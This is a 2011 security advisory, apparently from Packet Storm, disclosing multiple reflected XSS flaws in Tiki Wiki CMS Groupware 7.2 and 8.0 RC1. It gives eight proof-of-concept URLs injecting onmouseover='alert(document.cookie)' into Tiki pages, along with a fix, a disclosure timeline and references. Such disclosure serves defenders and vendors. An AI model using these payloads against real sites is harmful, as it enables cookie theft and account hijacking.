Tiki Wiki CMS Groupware Cross Site Scripting

2011-11-17T00:00:00
ID PACKETSTORM:107082
Type packetstorm
Reporter Stefan Schurtz
Modified 2011-11-17T00:00:00

Description

                                        
                                            `Advisory: Tiki Wiki CMS Groupware Multiple XSS vulnerabilities  
Advisory ID: INFOSERVE-ADV2011-01  
Author: Stefan Schurtz  
Contact: security@infoserve.de  
Affected Software: Successfully tested on Tiki 7.2 & 8.0 RC1  
Vendor URL: http://info.tiki.org/  
Vendor Status: fixed for Tiki 7 (New Tiki 6 LTS release in progress)  
CVE-ID: CVE-2011-4454, CVE-2011-4455  
  
==========================  
Vulnerability Description  
==========================  
  
All versions of Tiki 6 and Tiki 7 and version Tiki 8.0RC1 are prone to multiple XSS vulnerabilities  
  
==================  
PoC-Exploit  
==================  
  
8.0RC1  
  
http://<target>/tiki-8.0.RC1/tiki-remind_password.php/" onmouseover="alert(document.cookie)"  
http://<target>/tiki-8.0.RC1/tiki-index.php/" onmouseover="alert(document.cookie)"  
http://<target>/tiki-8.0.RC1/tiki-login_scr.php/" onmouseover="alert(document.cookie)"  
http://<target>/tiki-8.0.RC1/tiki-index/" onmouseover="alert(document.cookie)"  
  
7.2  
  
http://<target>/tiki-7.2/tiki-admin_system.php/" onmouseover="alert(document.cookie)"  
http://<target>/tiki-7.2/tiki-pagehistory.php/" onmouseover="alert(document.cookie)"  
http://<target>/tiki-7.2/tiki-removepage.php/" onmouseover="alert(document.cookie)"  
http://<target>/tiki-7.2/tiki-rename_page.php/" onmouseover="alert(document.cookie)"  
  
=========  
Solution  
=========  
  
Upgrade to Tiki 8.1 (End-of-Life for Tiki 7.x)  
  
====================  
Disclosure Timeline  
====================  
  
02-Nov-2011 - informed Security Team (security@tikiwiki.org)  
03-Nov-2011 - feedback from vendor  
11-Nov-2011 - release of version 8.1 (End-of-Life for Tiki 7.x)  
  
========  
Credits  
========  
  
Vulnerabilities found and advisory written by the INFOSERVE Security Team  
  
===========  
References  
===========  
  
http://info.tiki.org/  
http://dev.tiki.org/tiki-view_tracker_item.php?itemId=4027#content1  
http://info.tiki.org/article182-Tiki-8-1-Now-Available-End-of-Life-for-Tiki-7-x  
http://secunia.com/advisories/46740  
`